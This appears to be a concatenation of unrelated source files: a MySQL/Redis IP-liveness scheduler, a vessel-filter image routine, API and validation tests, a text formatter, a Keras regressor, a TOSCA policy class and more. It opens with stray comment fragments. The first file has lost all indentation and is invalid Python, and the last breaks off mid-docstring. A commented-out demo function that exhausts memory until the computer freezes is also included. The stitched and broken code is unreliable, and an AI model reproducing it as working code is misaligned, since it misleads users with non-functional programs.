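# where some_resource is a resources.Resource describing the kind being patched;
# the names and values here are hypothetical.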
|
the-stack_106_19105
|
# -*- coding: utf-8 -*-
"""Scheduled scan mysql. Send finished group information to php"""
import gevent
from config.conf import conf
from kits.iplive import iplive
from kits.utils import get_groups
from kits.ding import send_ding_msg
from kits.utils import get_sleep_time
from kits.utils import get_records
from kits.utils import get_all_nodes
from kits.data_dictionary import NOT_SYNC_TO_NODE
def vice_callback(_ts):
groups = get_groups(_ts)
ret_obj = dict()
all_node_down_ips = []
redis_key = "iplive_cache:%d" % _ts
for group in groups:
group_id = str(group['group_id'])
app_name = group['app_name']
records = get_records(group_id, app_name)
ret_obj[group_id] = {}
if group['level'] is 4:
node_ips = get_all_nodes()
else:
node_ips = group["node_ips"].split(":")
for record in records:
_ip = record['ip']
server_id = record['server_id']
values = []
for node_ip in node_ips:
name = ":".join([node_ip, str(server_id)])
value = conf['redis'].hget(redis_key, name)
if value:
values.append(value)
ip_status, res_time = iplive(values, group['level'], _ip)
if ip_status is NOT_SYNC_TO_NODE:
continue
sql = "UPDATE records SET last_status = %s, res_time = %s WHERE server_id = %s"
conf['mysql'].update(sql, [ip_status, res_time, server_id])
ret_obj[str(group_id)][_ip] = {
'status': ip_status,
'res_time': res_time
}
if ip_status != 0:
all_node_down_ips.append(_ip)
if all_node_down_ips:
msg = "全部节点检测都宕机的 IP列表: [%s]" % ', '.join(all_node_down_ips)
send_ding_msg(msg)
print(ret_obj)
# ==================== send this message back to php ========================
def callback_poller():
# Store all the nodes in redis, then whenever a result arrives compare whether
# the number of results received has reached the required count.
# The fatal flaw: what if a node times out or sends one result too few?
# The only way around that is to set up a timer on the server side.
print("Starting callback poller to php .....")
while True:
sleep_time, _ts = get_sleep_time()
gevent.sleep(sleep_time + 15)
vice_callback(_ts)
|
the-stack_106_19106
|
import click
import numpy as np
from numpy.fft import fft, ifft
from scipy.special import jv as besselj
import nibabel as nib
from tqdm import tqdm
EPSILON = 1e-12
class OOF:
def __init__(self, input_path=None):
self.nifti = None
self.array = None
self.radii = None
self.spacing = 1, 1, 1
self.num_radii = 6
if input_path is not None:
self.nifti = nib.load(str(input_path))
self.array = self.nifti.get_data()
self.spacing = self.get_spacing()
self.radii = self.get_radii()
self.sigma = min(self.spacing)
self.response_type = 0
self.use_absolute = True
self.normalization_type = 1
def get_spacing(self):
return self.nifti.header.get_zooms()
def get_radii(self):
return np.arange(1, self.num_radii + 1) * min(self.spacing)
def check_normalization(self, radii):
if min(radii) < self.sigma and self.normalization_type > 0:
print('Sigma must be >= minimum range to enable the advanced'
' normalization. The current setting falls back to'
' normalization_type = 0 because of the undersize sigma.')
self.normalization_type = 0
def compute_oof(self, array, radii):
array = array.astype(np.double)
shape = array.shape
output = np.zeros(shape)
self.check_normalization(radii)
imgfft = fft(array)
x, y, z, sphere_radius = get_min_sphere_radius(shape, self.spacing)
for radius in tqdm(radii):
tqdm.write(f'Computing radius {radius:.3f}...')
circle = circle_length(radius)
nu = 1.5
# Use a separate name for the scalar Bessel argument so that the z
# coordinate grid computed above is not shadowed.
bessel_arg = circle * EPSILON
bessel = besselj(nu, bessel_arg) / EPSILON**(3 / 2)
base = radius / np.sqrt(2 * radius * self.sigma - self.sigma**2)
exponent = self.normalization_type
volume = get_sphere_volume(radius)
normalization = volume / bessel / radius**2 * base**exponent
exponent = - self.sigma**2 * 2 * np.pi**2 * sphere_radius**2
num = normalization * np.exp(exponent)
den = sphere_radius**(3/2)
besselj_buffer = num / den
cs = circle * sphere_radius
a = np.sin(cs) / cs - np.cos(cs)
b = np.sqrt(1 / (np.pi**2 * radius * sphere_radius))
besselj_buffer = besselj_buffer * a * b * imgfft
outputfeature_11 = np.real(ifft(x * x * besselj_buffer))
outputfeature_12 = np.real(ifft(x * y * besselj_buffer))
outputfeature_13 = np.real(ifft(x * z * besselj_buffer))
outputfeature_22 = np.real(ifft(y * y * besselj_buffer))
outputfeature_23 = np.real(ifft(y * z * besselj_buffer))
outputfeature_33 = np.real(ifft(z * z * besselj_buffer))
eigenvalues = eigenvalue_field33(
outputfeature_11,
outputfeature_12,
outputfeature_13,
outputfeature_22,
outputfeature_23,
outputfeature_33
)
lambda_1, lambda_2, lambda_3 = eigenvalues
maxe = np.copy(lambda_1)
mine = np.copy(lambda_1)
mide = maxe + lambda_2 + lambda_3
if self.use_absolute:
maxe[np.abs(lambda_2) > np.abs(maxe)] = lambda_2[np.abs(lambda_2) > np.abs(maxe)]
mine[np.abs(lambda_2) < np.abs(mine)] = lambda_2[np.abs(lambda_2) < np.abs(mine)]
maxe[np.abs(lambda_3) > np.abs(maxe)] = lambda_3[np.abs(lambda_3) > np.abs(maxe)]
mine[np.abs(lambda_3) < np.abs(mine)] = lambda_3[np.abs(lambda_3) < np.abs(mine)]
else:
maxe[lambda_2 > np.abs(maxe)] = lambda_2[lambda_2 > np.abs(maxe)]
mine[lambda_2 < np.abs(mine)] = lambda_2[lambda_2 < np.abs(mine)]
maxe[lambda_3 > np.abs(maxe)] = lambda_3[lambda_3 > np.abs(maxe)]
mine[lambda_3 < np.abs(mine)] = lambda_3[lambda_3 < np.abs(mine)]
mide -= maxe + mine
if self.response_type == 0:
tmpfeature = maxe
elif self.response_type == 1:
tmpfeature = maxe + mide
elif self.response_type == 2:
tmpfeature = np.sqrt(np.maximum(0, maxe * mide))
elif self.response_type == 3:
tmpfeature = np.sqrt(
np.maximum(0, maxe * mide) * np.maximum(0, mide))
elif self.response_type == 4:
tmpfeature = np.maximum(0, maxe)
elif self.response_type == 5:
tmpfeature = np.maximum(0, maxe + mide)
stronger_response = np.abs(tmpfeature) > np.abs(output)
output[stronger_response] = tmpfeature[stronger_response]
return output
def run(self, output_path):
oof = self.compute_oof(self.array, self.radii)
output_nii = nib.Nifti1Image(oof, self.nifti.affine)
output_nii.header['sform_code'] = 0
output_nii.header['qform_code'] = 1
output_nii.to_filename(str(output_path))
def get_min_sphere_radius(shape, spacing):
x, y, z = ifft_shifted_coordinates_matrix(shape)
si, sj, sk = shape
pi, pj, pk = spacing
x /= si * pi
y /= sj * pj
z /= sk * pk
sphere_radius = np.sqrt(x**2 + y**2 + z**2) + EPSILON
return x, y, z, sphere_radius
def get_sphere_volume(radius):
return 4 / 3 * np.pi * radius**3
def circle_length(radius):
return 2 * np.pi * radius
def ifft_shifted_coordinates_matrix(shape):
shape = np.array(shape)
dimensions = len(shape)
p = shape // 2
result = []
for i in range(dimensions):
x = np.arange(p[i], shape[i])
y = np.arange(p[i])
a = np.concatenate((x, y)) - p[i]
reshapepara = np.ones(dimensions, np.uint16)
reshapepara[i] = shape[i]
A = np.reshape(a, reshapepara)
repmatpara = np.copy(shape)
repmatpara[i] = 1
coords = np.tile(A, repmatpara).astype(float)
result.append(coords)
return result
def freq_op(freq, marginwidth):
result = freq[marginwidth[0]:-1 - marginwidth[0],
marginwidth[1]:-1 - marginwidth[1],
marginwidth[2]:-1 - marginwidth[2]]
return result
def eigenvalue_field33(a11, a12, a13, a22, a23, a33, epsilon=1e-50):
"""
Calculate the eigenvalues of massive 3x3 real symmetric matrices.
Computation is based on matrix operation and GPU computation is
supported.
Syntax:
λ1, λ2, λ3 = eigenvaluefield33(a11, a12, a13, a22, a23, a33)
a11, a12, a13, a22, a23 and a33 specify the symmetric 3x3 real symmetric
matrices as:
[[a11, a12, a13],
[a12, a22, a23],
[a13, a23, a33]]
These six inputs must have the same size. They can be 2D, 3D or any
dimension. The outputs eigenvalue1, eigenvalue2 and eigenvalue3 will
follow the size and dimension of these inputs. Owing to the use of
trigonometric functions, the inputs must be double to maintain the
accuracy.
eigenvalue1, eigenvalue2 and eigenvalue3 are the unordered resultant
eigenvalues. They are solved using the cubic equation solver, see
http://en.wikipedia.org/wiki/Eigenvalue_algorithm
The peak memory consumption of the method is about 1.5 times of the total
of all inputs, in addition to the original inputs.
Author: Max W.K. Law
Email: [email protected]
Page: http://www.cse.ust.hk/~maxlawwk/
Python implementation by:
Fernando Perez-Garcia
[email protected]
"""
a11 = a11.astype(np.double)
a12 = a12.astype(np.double)
a13 = a13.astype(np.double)
a22 = a22.astype(np.double)
a23 = a23.astype(np.double)
a33 = a33.astype(np.double)
b = a11 + epsilon
d = a22 + epsilon
j = a33 + epsilon
c = - (a12**2 + a13**2 + a23**2 - b * d - d * j - j * b)
mul1 = a23**2 * b + a12**2 * j + a13**2 * d
mul2 = a13 * a12 * a23
d = - (b * d * j - mul1 + 2 * mul2)
b = - a11 - a22 - a33 - epsilon - epsilon - epsilon
d += (2 * b**3 - 9 * b * c) / 27
c *= -1
c += b**2 / 3
c **= 3
c /= 27
np.maximum(0, c, out=c)
np.sqrt(c, out=c)
j = c**(1 / 3)
c += c == 0
d *= - 1 / 2 / c
np.clip(d, -1, 1, out=d)
d = np.real(np.arccos(d) / 3)
c = j * np.cos(d)
d = j * np.sqrt(3) * np.sin(d)
b *= - 1 / 3
j = - c - d + b
d += b - c
b += 2 * c
lambda_1 = b.astype(np.single)
lambda_2 = j.astype(np.single)
lambda_3 = d.astype(np.single)
return lambda_1, lambda_2, lambda_3
@click.command()
@click.argument('input-path', type=click.Path(exists=True))
@click.argument('output-path', type=click.Path())
def main(input_path, output_path):
OOF(input_path).run(output_path)
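# --- Illustrative CLI usage (an assumption, not part of the original file) ---
# Assuming main() is exposed via an `if __name__ == '__main__': main()` guard or
# a console-script entry point, the command would typically be invoked as
# (file names are hypothetical):
#
#   python oof.py input.nii.gz vesselness.nii.gz
#
# which loads the NIfTI volume, evaluates the oriented-flux response over the
# default radii (1..num_radii times the smallest voxel spacing) and writes the
# result to the given output path.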
|
the-stack_106_19108
|
import time
from _common import *
from boardgamegeek import BGGValueError, BGGRestrictSearchResultsTo
def test_search(bgg, mocker):
mock_get = mocker.patch("requests.sessions.Session.get")
mock_get.side_effect = simulate_bgg
res = bgg.search("some invalid game name", exact=True)
assert not len(res)
res = bgg.search("Twilight Struggle", exact=True)
assert len(res)
# test that the new type of search works
res = bgg.search("Agricola", search_type=[BGGRestrictSearchResultsTo.BOARD_GAME])
assert type(res[0].id) == int
with pytest.raises(BGGValueError):
bgg.search("Agricola", search_type=["invalid-search-type"])
|
the-stack_106_19109
|
# Generators and their importance:
# Freezer code, do not run it outside a controlled environment
# THIS CODE WILL GRADUALLY FILL UP MEMORY WITH AN ABSURDLY LONG LIST OF NUMBERS UNTIL THE PC FREEZES.
"""def travador(max_number):
r = []
for c in range(max_number + 1):
r.append(c)
g = travador(623*10**21)
for v in g:
print(v)"""
# BELOW YOU WILL SEE A WAY TO PRODUCE THE SAME GIGANTIC SEQUENCE LITTLE BY LITTLE, WITHOUT NECESSARILY FREEZING THE COMPUTER.
"""def gerador(max_number):
for c in range(max_number + 1):
yield c
g = gerador(623*10**21)
for v in g:
print(v)"""
lista1 = [1,2,3,4,5,6]
lista2 = [6,7,8,9,10]
def soma(*args):
lista_soma = [x + y for x, y in zip(*args)]
return lista_soma
print(soma(lista1, lista2))
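# --- Illustrative sketch (an assumption, not part of the original file) ---
# A generator expression gives the same lazy, one-value-at-a-time behaviour as
# the yield-based gerador() shown above, without materialising the whole range:
lazy = (c for c in range(623 * 10**21))
print(next(lazy))  # 0
print(next(lazy))  # 1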
|
the-stack_106_19113
|
#!/usr/bin/env python3
r"""
usage: fmt.py [-h] [-w WIDTH] [--ruler]
join lines of the same indentation, and split at width or before it
options:
-h, --help show this help message and exit
-w WIDTH width to split at or before (default: don't print into last column of terminal)
--ruler show a ruler to count off the columns
quirks:
buffers whole paragraphs, not just lines, but takes each blank line as its own paragraph
joins and splits all lines, not just lines that don't begin with an nroff "." dot
defaults to fit inside terminal width, not to the prefer 65 within max 75 of bash "fmt"
guesses -w terminal width from "COLUMNS", else sys.stdout, else "/dev/tty", else guesses 80
prints '_' skids onto the ruler to mark the tabsize=8 tab stops: 1, 9, 17, ...
unsurprising quirks:
prompts for stdin, like mac bash "grep -R .", unlike bash "fmt"
accepts the "stty -a" line-editing c0-control's, not also the "bind -p" c0-control's
takes file "-" as meaning "/dev/stdin", like linux "fmt -", unlike mac "fmt -"
examples:
echo 'a b c d e f g h i j k l m' |fmt.py -9 # keep blanks except at joins and splits
echo ' a b c$ d e f$ g$$h' |tr '$' '\n' |fmt.py -9 # group by common indents
echo ' a b c' |fmt.py -1 # forward indentation wider than wanted, if present
:
echo $(seq 0 99) |fmt.py # split to fit inside Terminal
echo $(seq 0 39) |fmt.py -42 # split to fit inside width
echo $(seq 0 39) |tr -d ' ' |fmt.py -42 # no split at width
echo su-per-ca-li-fra-gil-is-tic-ex-pi-a-li-doc-ious |fmt.py -42 # no split at "-" dashes
:
fmt.py --ruler -w72 # ends in column 72
: # 5678_0123456_8901234_6789012_4567890 2345678_0123456_8901234_6789012 # the 72-column ruler
"""
# FIXME: -h25 -w79 to help shrink a G Cloud Shell that far
import os
import re
import sys
import textwrap
import argdoc
def main(argv):
"""Run from the command line"""
stdout_columns = sys_stdout_guess_tty_columns()
# Parse the command line
fmt_argv_tail = list(argv[1:])
for (index, arg) in enumerate(argv[1:]):
if re.match(r"^[-][0-9]+$", string=arg):
fmt_argv_tail[index] = "-w{}".format(-int(arg))
args = argdoc.parse_args(fmt_argv_tail)
width = (stdout_columns - 1) if (args.w is None) else int(args.w)
# Option to print the ruler and discard Stdin
if args.ruler:
print_ruler(width)
return
# Else join and split Stdin
fmt_paragraphs_of_stdin(width)
def print_ruler(width):
"""Print one monospaced char per column to help number the columns accurately"""
dupes = (width + 10 - 1) // 10
chars = dupes * "1234567890" # one-based, not zero-based
assert len(chars) >= width
ruler = chars[:width]
for tabstop in range(0, width, 8):
ruler = ruler[:tabstop] + "_" + ruler[(tabstop + 1) :]
for halfscreen in range(40, width, 40):
ruler = ruler[:halfscreen] + " " + ruler[(halfscreen + 1) :]
assert len(ruler) == width
print(ruler.rstrip())
def fmt_paragraphs_of_stdin(width):
"""Join lines of the same indentation, and split at width or before it"""
column = width + 1
prompt_tty_stdin("Joining words, resplitting before column {}".format(column))
para = list()
para_dent = None
while True:
line = sys.stdin.readline()
if not line:
if para:
fmt_one_paragraph(para_dent, para=para, width=width)
break
(str_dent, text) = str_splitdent(line)
rstripped = text.rstrip()
dent = str_dent if rstripped else None
if (dent != para_dent) or (not rstripped):
if para:
fmt_one_paragraph(para_dent, para=para, width=width)
para = list()
para_dent = dent
if rstripped:
para.append(rstripped)
else:
print()
def fmt_one_paragraph(dent, para, width):
"""Join words of one paragraph, resplit them into fewest wide lines, and print the lines"""
assert dent is not None
assert all(_ for _ in para)
text = "\n".join(para)
fill_width = (width - len(dent)) if (len(dent) < width) else 1
fill_chars = textwrap.fill(
text, width=fill_width, break_on_hyphens=False, break_long_words=False
)
fill_lines = fill_chars.splitlines()
assert fill_lines # TODO: think some more here
for fill_line in fill_chars.splitlines():
print((dent + fill_line).rstrip())
#
# Define some Python idioms
#
# deffed in many files # missing from docs.python.org
def sys_stdout_guess_tty_columns(*hints):
"""
Run all the searches offered, accept the first result found if any, else return None
Default to search: "COLUMNS", sys.stdout, "/dev/tty", 80
To fail fast, call for all the guesses always, while still returning only the first that works
"""
chosen_hints = hints if hints else ("COLUMNS", sys.stdout, "/dev/tty", 80)
terminal_widths = list()
for hint in chosen_hints:
terminal_width = sys_stdout_guess_tty_columns_os(hint)
if terminal_width is None:
terminal_width = sys_stdout_guess_tty_columns_os_environ_int(hint)
else:
_ = sys_stdout_guess_tty_columns_os_environ_int(hint)
if terminal_width is not None:
terminal_widths.append(terminal_width)
if terminal_widths:
terminal_width = terminal_widths[0]
return terminal_width
return None
# deffed in many files # missing from docs.python.org
def sys_stdout_guess_tty_columns_os(hint):
"""Try "os.get_terminal_size", and slap back "shutil.get_terminal_size" pushing (80, 24)"""
showing = None
fd = None
if hasattr(hint, "fileno"):
streaming = hint
fd = streaming.fileno()
elif hasattr(hint, "startswith"):
if hint.startswith(os.sep):
devname = hint
showing = open(devname) # pylint: disable=consider-using-with
fd = showing.fileno()
terminal_width = None
if fd is not None:
try:
terminal_size = os.get_terminal_size(fd)
terminal_width = terminal_size.columns
except OSError: # such as OSError: [Errno 25] Inappropriate ioctl for device
pass
if showing:
showing.close()
return terminal_width
# deffed in many files # missing from docs.python.org
def sys_stdout_guess_tty_columns_os_environ_int(hint):
"""Pull digits from "os.environ" via the hint as key, else from the hint itself"""
digits = hint
if hasattr(hint, "startswith"):
envname = hint
try:
digits = os.environ[envname]
except KeyError: # such as KeyError: 'COLUMN'
pass
try:
terminal_width = int(digits)
except TypeError: # such as TypeError: must be ... not 'list'
terminal_width = None
except ValueError: # such as ValueError: invalid literal ... with base 10
terminal_width = None
return terminal_width
# deffed in many files # missing from docs.python.org
def prompt_tty_stdin(message=None):
if sys.stdin.isatty():
if message is not None:
stderr_print(message)
stderr_print("Press ⌃D EOF to quit")
# deffed in many files # missing from docs.python.org
def str_splitdent(line):
"""Split apart the indentation of a line, from the remainder of the line"""
lstripped = line.lstrip()
len_dent = len(line) - len(lstripped)
tail = lstripped
if not lstripped: # see no chars, not all chars, as the indentation of a blank line
tail = line
len_dent = 0
dent = len_dent * " "
return (dent, tail)
# deffed in many files # missing from docs.python.org
def stderr_print(*args):
"""Print the Args, but to Stderr, not to Stdout"""
sys.stdout.flush()
print(*args, file=sys.stderr)
sys.stderr.flush() # like for kwargs["end"] != "\n"
if __name__ == "__main__":
main(sys.argv)
# copied from: git clone https://github.com/pelavarre/pybashish.git
|
the-stack_106_19114
|
from __future__ import print_function, absolute_import, division, unicode_literals
# This file is part of the ISIS IBEX application.
# Copyright (C) 2012-2016 Science & Technology Facilities Council.
# All rights reserved.
#
# This program is distributed in the hope that it will be useful.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License v1.0 which accompanies this distribution.
# EXCEPT AS EXPRESSLY SET FORTH IN THE ECLIPSE PUBLIC LICENSE V1.0, THE PROGRAM
# AND ACCOMPANYING MATERIALS ARE PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND. See the Eclipse Public License v1.0 for more details.
#
# You should have received a copy of the Eclipse Public License v1.0
# along with this program; if not, you can obtain a copy from
# https://www.eclipse.org/org/documents/epl-v10.php or
# http://opensource.org/licenses/eclipse-1.0.php
# Add root path for access to server_commons
import os
import sys
os.environ["MYDIRBLOCK"] = os.path.abspath('..')
sys.path.insert(0, os.path.abspath(os.environ["MYDIRBLOCK"]))
# Standard imports
import unittest
import xmlrunner
import argparse
DEFAULT_DIRECTORY = os.path.join('..', '..', '..', '..', 'test-reports')
if __name__ == '__main__':
# get output directory from command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output_dir', nargs=1, type=str, default=[DEFAULT_DIRECTORY],
help='The directory to save the test reports')
args = parser.parse_args()
xml_dir = args.output_dir[0]
# Load tests from test suites
test_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "test_modules"))
test_suite = unittest.TestLoader().discover(test_dir, pattern="test_*.py")
print("\n\n------ BEGINNING DATABASE SERVER UNIT TESTS ------")
ret_vals = xmlrunner.XMLTestRunner(output=xml_dir).run(test_suite)
print("------ DATABASE SERVER UNIT TESTS COMPLETE ------\n\n")
# Return failure exit code if a test failed
sys.exit(bool(ret_vals.errors or ret_vals.failures))
|
the-stack_106_19116
|
# coding: utf-8
#
# Copyright 2021 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for blog model job errors."""
from __future__ import annotations
from core import utils
from core.jobs.types import base_validation_errors_test
from core.jobs.types import blog_validation_errors
from core.platform import models
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import blog_models
(blog_models,) = models.Registry.import_models([models.NAMES.blog])
class DuplicateBlogTitleErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
blog_post_model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1')
error = blog_validation_errors.DuplicateBlogTitleError(blog_post_model)
self.assertEqual(
error.stderr,
'DuplicateBlogTitleError in BlogPostModel(id="validblogid1"):'
' title=%s is not unique' % utils.quoted(blog_post_model.title))
class DuplicateBlogUrlErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
blog_post_model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1')
error = blog_validation_errors.DuplicateBlogUrlError(blog_post_model)
self.assertEqual(
error.stderr,
'DuplicateBlogUrlError in BlogPostModel(id="validblogid1"): url=%s'
' is not unique' % utils.quoted(blog_post_model.url_fragment))
class InconsistentPublishTimestampsErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1',
created_on=self.NOW,
last_updated=self.YEAR_AGO,
published_on=self.YEAR_AGO)
error = blog_validation_errors.InconsistentPublishTimestampsError(model)
self.assertEqual(
error.stderr,
'InconsistentPublishTimestampsError in BlogPostModel'
'(id="validblogid1"): created_on=%r is later than published_on=%r' %
(self.NOW, self.YEAR_AGO))
class InconsistentPublishLastUpdatedTimestampsErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1',
created_on=self.YEAR_AGO,
last_updated=self.YEAR_AGO,
published_on=self.NOW)
error = (
blog_validation_errors
.InconsistentPublishLastUpdatedTimestampsError(model))
self.assertEqual(
error.stderr,
'InconsistentPublishLastUpdatedTimestampsError in BlogPostModel'
'(id="validblogid1"): published_on=%r is later than last_updated=%r'
% (self.NOW, self.YEAR_AGO))
class ModelMutatedDuringJobErrorTests(
base_validation_errors_test.AuditErrorsTestBase):
def test_message(self) -> None:
model = blog_models.BlogPostModel(
id='validblogid1',
title='Sample Title',
content='<p>hello</p>,',
author_id='user',
url_fragment='url_fragment_1',
created_on=self.YEAR_AGO,
last_updated=self.NOW,
published_on=self.YEAR_AGO)
error = blog_validation_errors.ModelMutatedDuringJobError(model)
self.assertEqual(
error.stderr,
'ModelMutatedDuringJobError in BlogPostModel(id="validblogid1"): '
'published_on=%r is later than the audit job\'s start time' % (
model.published_on))
|
the-stack_106_19117
|
import tensorflow as tf
from tensorflow import keras
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import mean_absolute_error, mean_squared_error
class MLPModel():
def __init__(self, args):
self.args = args
self.feat_dim = args['feat_dim']
self.batch_size = args['batch_size']
self.epochs = args['epochs']
self.lr = args['lr']
self.build_model()
def build_model(self):
inputs = keras.Input(shape=(self.feat_dim,))
x = keras.layers.Dense(20, activation='relu')(inputs)
x = keras.layers.Dropout(0.5)(x)
x = keras.layers.Dense(50, activation='relu')(x)
x = keras.layers.Dropout(0.5)(x)
x = keras.layers.Dense(50, activation='relu')(x)
x = keras.layers.Dropout(0.5)(x)
x = keras.layers.Dense(20, activation='relu')(x)
x = keras.layers.Dropout(0.5)(x)
outputs = keras.layers.Dense(1)(x)
self.model = keras.Model(inputs=inputs, outputs=outputs)
self.model.compile(optimizer=tf.train.AdamOptimizer(self.lr),
loss='mse',
metrics=['mse'])
def train(self, data, label, val_data, val_label):
        data, label = self.data_scaler(data, label)
val_data = self.x_scaler.transform(val_data)
val_label = self.y_scaler.transform(val_label.reshape(-1, 1)).reshape(-1)
callback = keras.callbacks.EarlyStopping(monitor='val_mse', patience=10, restore_best_weights=True)
self.model.fit(data, label, batch_size=self.batch_size, epochs=self.epochs, callbacks=[callback], validation_data=(val_data, val_label))
def data_scaler(self, data, label):
self.x_scaler = StandardScaler().fit(data)
scaled_data = self.x_scaler.transform(data)
self.y_scaler = StandardScaler().fit(label.reshape(-1, 1))
scaled_label = self.y_scaler.transform(label.reshape(-1, 1)).reshape(-1)
return scaled_data, scaled_label
def evaluate(self, test_data, test_label):
scaled_test_data = self.x_scaler.transform(test_data)
pred = self.model.predict(scaled_test_data)
        pred_label = pred * self.y_scaler.scale_[0] + self.y_scaler.mean_[0]  # invert the label standardisation
pred_label = pred_label.reshape(-1)
mae = mean_absolute_error(test_label, pred_label)
mse = mean_squared_error(test_label, pred_label)
print('test mae: {}'.format(mae))
print('test mse: {}'.format(mse))
return pred_label
# data = np.random.random((100, 1))
# label = data
# val_data = np.random.random((10, 1))
# val_label = val_data
# # x = tf.placeholder(tf.float32, shape=[None, 1], )
# inputs = keras.Input(shape=(1,))
# outputs = keras.layers.Dense(1,
# kernel_initializer=keras.initializers.Constant(1.0),
# bias_initializer=keras.initializers.Constant(0.0))(inputs)
# model = keras.Model(inputs=inputs, outputs=outputs)
# model.compile(optimizer=tf.train.AdamOptimizer(0.001),
# loss='mse',
# metrics=['mse'])
# model.fit(data, label, epochs=0, batch_size=32,
# validation_data=(val_data, val_label))
# tf.saved_model.simple_save(keras.backend.get_session(),
# "./model",
# inputs={'inputs': inputs},
# outputs={'outputs': outputs})
# pred_label = model.predict(val_data)
# print('pred label: ', pred_label)
# print('val_label: ', val_label)
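# --- Usage sketch (illustrative only, not part of the original module) ---
# Shows the intended train/evaluate flow of MLPModel with synthetic data; the
# dict keys mirror those read in __init__ and all values are placeholders.
#
# if __name__ == '__main__':
#     args = {'feat_dim': 10, 'batch_size': 32, 'epochs': 5, 'lr': 1e-3}
#     mlp = MLPModel(args)
#     train_x, train_y = np.random.random((200, 10)), np.random.random(200)
#     val_x, val_y = np.random.random((50, 10)), np.random.random(50)
#     mlp.train(train_x, train_y, val_x, val_y)
#     mlp.evaluate(np.random.random((20, 10)), np.random.random(20))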
|
the-stack_106_19121
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from toscaparser.common.exception import ExceptionCollector
from toscaparser.common.exception import InvalidTypeError
from toscaparser.common.exception import UnknownFieldError
from toscaparser.elements.statefulentitytype import StatefulEntityType
from toscaparser.utils.validateutils import TOSCAVersionProperty
class PolicyType(StatefulEntityType):
'''TOSCA built-in policies type.'''
SECTIONS = (DERIVED_FROM, METADATA, PROPERTIES, VERSION, DESCRIPTION, TARGETS) = \
('derived_from', 'metadata', 'properties', 'version',
'description', 'targets')
def __init__(self, ptype, custom_def=None):
super(PolicyType, self).__init__(ptype, self.POLICY_PREFIX,
custom_def)
self.type = ptype
self._validate_keys()
self.meta_data = None
if self.METADATA in self.defs:
self.meta_data = self.defs[self.METADATA]
self._validate_metadata(self.meta_data)
self.properties = None
if self.PROPERTIES in self.defs:
self.properties = self.defs[self.PROPERTIES]
self.parent_policies = self._get_parent_policies()
self.policy_version = None
if self.VERSION in self.defs:
self.policy_version = TOSCAVersionProperty(
self.defs[self.VERSION]).get_version()
self.policy_description = self.defs[self.DESCRIPTION] \
if self.DESCRIPTION in self.defs else None
self.targets_list = None
if self.TARGETS in self.defs:
self.targets_list = self.defs[self.TARGETS]
self._validate_targets(self.targets_list, custom_def)
def _get_parent_policies(self):
policies = {}
parent_policy = self.parent_type
if parent_policy:
while parent_policy != 'tosca.policies.Root':
policies[parent_policy] = self.TOSCA_DEF[parent_policy]
parent_policy = policies[parent_policy]['derived_from']
return policies
@property
def parent_type(self):
'''Return a policy this policy is derived from.'''
return self.derived_from(self.defs)
def get_policy(self, name):
'''Return the definition of a policy field by name.'''
if name in self.defs:
return self.defs[name]
@property
def targets(self):
'''Return targets.'''
return self.targets_list
@property
def description(self):
return self.policy_description
@property
def version(self):
return self.policy_version
def _validate_keys(self):
for key in self.defs.keys():
if key not in self.SECTIONS:
ExceptionCollector.appendException(
UnknownFieldError(what='Policy "%s"' % self.type,
field=key))
def _validate_targets(self, targets_list, custom_def):
for nodetype in targets_list:
if nodetype not in custom_def:
ExceptionCollector.appendException(
InvalidTypeError(what='"%s" defined in targets for '
'policy "%s"' % (nodetype, self.type)))
def _validate_metadata(self, meta_data):
        if meta_data.get('type') not in ['map', 'tosca:map']:
ExceptionCollector.appendException(
InvalidTypeError(what='"%s" defined in policy for '
'metadata' % (meta_data.get('type'))))
for entry_schema, entry_schema_type in meta_data.items():
if isinstance(entry_schema_type, dict) and not \
entry_schema_type.get('type') == 'string':
ExceptionCollector.appendException(
InvalidTypeError(what='"%s" defined in policy for '
'metadata "%s"'
% (entry_schema_type.get('type'),
entry_schema)))
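# --- Usage sketch (illustrative only; assumes the standard TOSCA definitions
# bundled with tosca-parser are loadable) ---
# 'tosca.policies.Placement' is just an example of a built-in policy type.
#
# ptype = PolicyType('tosca.policies.Placement')
# print(ptype.parent_type)      # e.g. 'tosca.policies.Root'
# print(ptype.parent_policies)  # ancestors of the policy, keyed by type name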
|
the-stack_106_19123
|
"""Utility functions."""
import inspect
import logging
from typing import Any, List, Optional, cast, Iterable, Set, Dict
from homebot.validator import is_iterable_but_no_str
def make_list(value: Any, null_empty: bool = True) -> Optional[List[Any]]:
"""
Makes a list out of the given value. If value is a list, nothing is changed.
    If value is an iterable (but not a str), it will be converted to a list. If value is
    neither a list nor an iterable it will be converted to a single-element list.
